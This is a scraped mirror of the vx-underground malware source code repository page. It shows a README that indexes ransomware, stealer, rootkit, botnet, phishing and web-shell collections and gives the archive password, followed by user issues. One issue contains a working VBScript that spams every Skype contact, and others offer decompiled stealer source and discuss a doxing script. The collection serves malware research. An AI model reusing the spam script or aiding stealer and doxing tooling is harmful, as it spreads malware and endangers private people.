Coder Social home page Coder Social logo

vxunderground / malwaresourcecode Goto Github PK

View Code? Open in Web Editor NEW
15.3K 736.0 1.7K 1.95 GB

Collection of malware source code for a variety of platforms in an array of different programming languages.

Home Page: https://vx-underground.org

Assembly 92.31% C 2.01% Perl 0.27% Roff 1.31% Limbo 0.87% D 0.05% Forth 0.24% Brainfuck 1.59% GAP 0.24% Objective-J 0.02% Python 0.04% Shell 0.02% Lex 0.31% Java 0.21% M 0.02% HTML 0.04% C++ 0.12% Pascal 0.23% Verilog 0.06% BASIC 0.03%
malware malware-research malware-development malware-detection

malwaresourcecode's Introduction

VXUG logo managed by vx-underground | follow us on Twitter | download malware samples at the VXUG/samples page

Liability Disclaimer:

To the maximum extent permitted by applicable law, vx-underground and/or affiliates who have submitted content to vx-underground, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

Notes

All source code which is packaged may or may not be set with the password 'infected' (without the '). Individual files are likely not packaged. Please do not comment asking for the password - it was placed all over vx-underground.org and the official vx-underground Twitter account.

File structure

  • Android
    • Generic Android OS malware, some leaks and proof-of-concepts
  • Engines
    • BAT
    • Linux
    • VBS
    • Win32
  • Java
    • Some java infectors, proof-of-concept ransomware
  • Javascript
    • In-browser malware
  • Legacy Windows
    • Win2k
    • Win32
    • Win95
    • Win98
    • Win9x
    • WinCE
  • Libs (libraries)
    • Bootkits
    • DDoS proof-of-concepts
    • Win32 libraries (disassemblers, etc).
  • Linux
    • Backdoors
    • Botnets
    • Infectors
    • Mirai-Family (related and/or spin-offs)
    • Rootkits
    • Tools
    • Trojans
  • MSDOS
  • MSIL
  • MacOS
  • Other
    • Acad malware
    • FreeBSD malware
    • SunOS malware
    • Symbian OS malware
    • Discord-specific malware
  • PHP
    • Albania family
    • C99 family
    • Crewcorp family
    • Defacement Tools
    • PHP Infectors
    • Lanker family
    • Macker family
    • PhpSpy family
    • R57-shell family
  • Panel (web panel collections)
  • Perl
    • Various backdoors, hack tools, and infectors
  • Phishing
    • Collection of various phishing pages
  • Point of Sales malware
  • Python
    • Hacktools, various exotic-malware (such as chastity belt ransomware)
  • Ruby
  • Win32
    • Binders
    • Botnets
    • Crypters
    • Exploit kits
    • Infectors
    • Internet worms
    • Malware families
    • Ransomware
    • Rootkits
    • Stealers

Contributors

Marius 'f0wL' Genheimer
Jan 'Duchy' Neduchal
Eduardo P. Gomez
DartPower
Luca364
TheAnonHackUk
Bruce Ediger
Avv
Alan Wake

malwaresourcecode's People

Contributors

aarush-dev avatar eduapps-cdg avatar f0wl avatar hexa-decim8 avatar luca364 avatar omache avatar theduchy avatar vxunderground avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

malwaresourcecode's Issues

isaid thatuous s ho GeneratorTroj by noxjoker (Decompiled) - Toolkit for making the malware (~2010)

Malware

Espero que me proteja de los que USURPAN MI IDENTIDAD

Tutorials

Are they up to date? And can you please make 'how to?' tutorials.

Addition of an MIT license to your repo

You can include an open source license in your repository to make it easier for other people to contribute.If you include a detectable license in your repository, people who visit your repository will see it at the top of the repository page

NEW SOURCE CODE

I decompile prynt malware source code and now i posted for free to anyone (Its the stub but if u understand what happens its easy to you to change the values)

Link to prynt stub source code

Enjoy (Btw its 95% stormkitty and 5% just changing names xddd)

Old skype spam messaging mini-trojan (VBS)

on error resume next
set skype = Wscript.CreateObject("Skype4com.Skype", "Skype")
Skype.Client.Start()
SkypeAttach()
For Each User In Skype.Friends
Skype.SendMessage User.handle, "Your Message Here"
next

Reg api access for malware samples

Hi Team, I had sent a mail from my official mail id couple of days back with respect to getting access to the API for downloading malware samples. I had few queries regarding the same which is also mentioned in the mail. Requesting your response to the same.

HVNC

What hvnc can u recommend ?

Some collection of malware & related source code

GSOME 0.6a and 0.7.0.3

GSOME 0.6a and 0.7.0.3
Old russian attack hackware, used by sub-culture radical (and fun) community "Upyachka"
Used for attacking VK (ex. VKontakte) groups with picture/message/video spam in ~2007-2010 years.
Decompiled, but this very useless in any case, because Vkontakte library very legacy and using not supported functions.
But i think this have a some historical attention 🤔

Bundled original executables and dll-libs with decompiled source code in two variants (dnSpy and ILSpy)
GSOME_TwoVersions.zip

./Python/Doxing-Script-Py3.py doesn't get proper html

Trying out doxing script. Most htmls the script gets are unable to get the profile page. For example Twitter returns a page that says "Something went wrong, but don\xe2\x80\x99t fret \xe2\x80\x94 let\xe2\x80\x99s give it another shot.".

Steps to reproduce:

python3 Doxing-Script-Py3.py stalk user vxunderground

I have commented out import face_recognition because it isn't available and isn't being used either way.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.